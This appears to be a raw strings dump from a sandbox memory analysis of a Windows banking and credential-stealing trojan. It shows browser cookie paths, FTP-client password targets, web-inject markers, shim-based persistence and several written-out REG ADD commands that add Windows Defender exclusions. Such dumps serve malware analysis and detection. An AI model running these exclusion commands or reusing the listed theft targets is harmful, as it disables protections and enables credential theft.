PF8-.XU
PF8-.XU
O3$dS7"%U9
O3$dS7"%U9
KERNEL32.DLL
KERNEL32.DLL
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
2.1.0.3
2.1.0.3
iscsicli.exe
iscsicli.exe
RedirectEXE
RedirectEXE
%temp%\..\..\LocalLow\cmd.%username%.bat
%temp%\..\..\LocalLow\cmd.%username%.bat
emsseces.exe
emsseces.exe
svchost.exe_1980_rwx_20010000_00001000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
svchost.exe_1512:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_1512_rwx_002B0000_00001000:
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
svchost.exe_1512_rwx_15190000_0003D000:
`.rsrc
`.rsrc
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
Gh.logWj
Gh.logWj
h.logPj
h.logPj
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
advapi32.dll
advapi32.dll
modules.dll
modules.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
\\.\pipe\
\\.\pipe\
VWRQRh.exe
VWRQRh.exe
h.exe
h.exe
ws2_32.dll
ws2_32.dll
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteA
ShellExecuteA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
rmnsoft.dll
rmnsoft.dll
google.com:80
google.com:80
bing.com:80
bing.com:80
yahoo.com:80
yahoo.com:80
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
\\.\131D2408D44C4f47AC647AB96987D4D5
\\.\131D2408D44C4f47AC647AB96987D4D5
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
1etexec
1etexec
complete.dat
complete.dat
SRQVWh.exe
SRQVWh.exe
h.exeVj
h.exeVj
h.exeh$~
h.exeh$~
tvh.exe
tvh.exe
PSSSSSSh
PSSSSSSh
More information: hXXp://VVV.ibsensoftware.com/
More information: hXXp://VVV.ibsensoftware.com/
Advapi32.dll
Advapi32.dll
RegDeleteKeyExA
RegDeleteKeyExA
com.%s.sdb
com.%s.sdb
%s\cmd.%s.bat
%s\cmd.%s.bat
start "" "%s"
start "" "%s"
"%%windir%%\%s\iscsicli.exe"
"%%windir%%\%s\iscsicli.exe"
/q "%s"
/q "%s"
\system32\sdbinst.exe"
\system32\sdbinst.exe"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
/q /u "%s"
/q /u "%s"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
:Zone.Identifier:$DATA
:Zone.Identifier:$DATA
:Zone.Identifier
:Zone.Identifier
svchost.exe
svchost.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
spoolsv.exe
spoolsv.exe
..\p.exe
..\p.exe
CheckBypassed ok
CheckBypassed ok
loader.exe
loader.exe
_CheckBypassed@0
_CheckBypassed@0
|GetWindowsDirectoryA
|GetWindowsDirectoryA
\/{X-X-X-X-XX}
\/{X-X-X-X-XX}
|ZwDelayExecution
|ZwDelayExecution
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
http\shell\open\command
http\shell\open\command
chrome.exe
chrome.exe
opera.exe
opera.exe
cmd.exe
cmd.exe
/C ""%s"" %s
/C ""%s"" %s
/C ""%s""
/C ""%s""
user32.DLL
user32.DLL
p.exe
p.exe
Rapport
Rapport
1onsent.exe
1onsent.exe
&.bAp
&.bAp
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
GetProcessHeap
GetProcessHeap
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
ShellExecuteExA
ShellExecuteExA
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHook
UnhookWindowsHook
EnumWindows
EnumWindows
.rdata
.rdata
.rsrc
.rsrc
PF8-.XU
PF8-.XU
O3$dS7"%U9
O3$dS7"%U9
KERNEL32.DLL
KERNEL32.DLL
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
2.1.0.3
2.1.0.3
iscsicli.exe
iscsicli.exe
RedirectEXE
RedirectEXE
%temp%\..\..\LocalLow\cmd.%username%.bat
%temp%\..\..\LocalLow\cmd.%username%.bat
emsseces.exe
emsseces.exe
svchost.exe_1512_rwx_20010000_00001000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
svchost.exe_1512_rwx_20021000_0000D000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
h.exe
h.exe
{X-X-X-X-XX}
{X-X-X-X-XX}
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
advapi32.dll
advapi32.dll
\AVG\AVG2013\avgui.exe
\AVG\AVG2013\avgui.exe
\AVAST Software\Avast\AvastUI.exe
\AVAST Software\Avast\AvastUI.exe
\ESET\ESET NOD32 Antivirus\egui.exe
\ESET\ESET NOD32 Antivirus\egui.exe
*.exe
*.exe
\Bitdefender\Bitdefender 2013\seccenter.exe
\Bitdefender\Bitdefender 2013\seccenter.exe
\uiStub.exe
\uiStub.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\wyxhmtka.log
%Documents and Settings%\%current user%\Local Settings\Application Data\wyxhmtka.log
GetWindowsDirectoryA
GetWindowsDirectoryA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ShellExecuteA
ShellExecuteA
ExitWindowsEx
ExitWindowsEx
.text
.text
.rdata
.rdata
@.data
@.data
.reloc
.reloc
{X-4
{X-4
Windows\CurrentVersion\Un
Windows\CurrentVersion\Un
api.SHD:
api.SHD:
eKeyA
eKeyA
XM%S_O;
XM%S_O;
svchost.exe_1512_rwx_20031000_00011000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
advapi32.dll
advapi32.dll
wshell32.dll
wshell32.dll
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
GetWindowsDirectoryA
GetWindowsDirectoryA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCloseKey
RegCloseKey
ExitWindowsEx
ExitWindowsEx
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
{X-
{X-
eKeyA
eKeyA
s^.exe
s^.exe
svchost.exe_1512_rwx_20051000_00011000:
0WSSh
0WSSh
h.log
h.log
%USERPROFILE%
%USERPROFILE%
Kernel32.dll
Kernel32.dll
%s %s %s: %s:%d
%s %s %s: %s:%d
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
ernel32.dllS.
ernel32.dllS.
ls.EnW
ls.EnW
m.div
m.div
svchost.exe_1512_rwx_20071000_000A0000:
i
i
.iniu>
.iniu>
.exeuZH
.exeuZH
=.datuLh
=.datuLh
Q=.bpsuLh
Q=.bpsuLh
.xmluIh
.xmluIh
t%SVP
t%SVP
.iniu
.iniu
.prfu1
.prfu1
h.log
h.log
Q.Rjv
Q.Rjv
H.Qjv
H.Qjv
#$%&'()* ,--
#$%&'()* ,--
-4-4--567
-4-4--567
s%j.Zf
s%j.Zf
j%Xf;
j%Xf;
>%u[f
>%u[f
FtpControl
FtpControl
32bit FTP
32bit FTP
LeapFtp
LeapFtp
SoftFx FTP
SoftFx FTP
ClassicFTP
ClassicFTP
WebSitePublisher
WebSitePublisher
FtpExplorer
FtpExplorer
Core ftp
Core ftp
Coffee cup ftp
Coffee cup ftp
FFFtp
FFFtp
TurboFtp
TurboFtp
SmartFtp
SmartFtp
BulletproofFTP
BulletproofFTP
FtpCommander
FtpCommander
Cute FTP
Cute FTP
WS FTP
WS FTP
Windows/Total commander
Windows/Total commander
PTF://
PTF://
Password
Password
password
password
FtpIniName
FtpIniName
svchost.exe_1512_rwx_20121000_0005D000:
svchost.exe_1512_rwx_20181000_00036000:
svchost.exe_1512_rwx_201C1000_0003F000:
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX
System32\Macromed\Flash\mms.cfg
System32\Macromed\Flash\mms.cfg
%SystemRoot%\
%SystemRoot%\
/get/flashplayer/current/licensing/win/install_flash_player_11_active_x_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_active_x_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
fpdownload.macromedia.com
fpdownload.macromedia.com
\install_flash_player_11_plugin_32bit.exe
\install_flash_player_11_plugin_32bit.exe
\install_flash_player_11_active_x_32bit.exe
\install_flash_player_11_active_x_32bit.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ardownload.adobe.com
ardownload.adobe.com
/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe
/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe
\AdbeRdr1012_en_US.exe
\AdbeRdr1012_en_US.exe
\Common Files\Java\Java Update\jucheck.exe
\Common Files\Java\Java Update\jucheck.exe
https
https
hXXp://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
hXXp://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
download.oracle.com
download.oracle.com
/otn-pub/java/jdk/6u31-b05/jre-6u31-windows-i586.exe
/otn-pub/java/jdk/6u31-b05/jre-6u31-windows-i586.exe
\jre-6u31-windows-i586-s.exe
\jre-6u31-windows-i586-s.exe
%s=%s
%s=%s
Range: bytes=%d-%d
Range: bytes=%d-%d
Cookie:%s
Cookie:%s
Cache-Control: %s
Cache-Control: %s
Connection: %s
Connection: %s
Content-Length: %d
Content-Length: %d
Host: %s
Host: %s
Accept-Encoding: %s
Accept-Encoding: %s
Content-Type: %s
Content-Type: %s
User-Agent: %s
User-Agent: %s
Accept-Language: %s
Accept-Language: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
%s %s HTTP/1.1
%s %s HTTP/1.1
Test Using Larger Than Block-Size Key - Hash Key First
Test Using Larger Than Block-Size Key - Hash Key First
Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data
Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data
This is a test using a larger than block-size key and a larger than block-size data. The key needs to be hashed before being used by the HMAC algorithm.
This is a test using a larger than block-size key and a larger than block-size data. The key needs to be hashed before being used by the HMAC algorithm.
gpw_e24=http://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
gpw_e24=http://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
s_sq=[[B]];
s_sq=[[B]];
%s=%s;
%s=%s;
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
svchost.exe_1512_rwx_20211000_00357000:
Explorer.EXE_532_rwx_20590000_00037000:
services.exe_724_rwx_20210000_00037000:
lsass.exe_736_rwx_20590000_00037000:
svchost.exe_904_rwx_20590000_00037000:
svchost.exe_988_rwx_20590000_00037000:
wmiprvse.exe_1068_rwx_20590000_00037000:
svchost.exe_1084_rwx_20590000_00037000:
svchost.exe_1128_rwx_20590000_00037000:
svchost.exe_1180_rwx_20590000_00037000:
spoolsv.exe_1424_rwx_20590000_00037000:
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
jqs.exe_1640_rwx_20590000_00037000: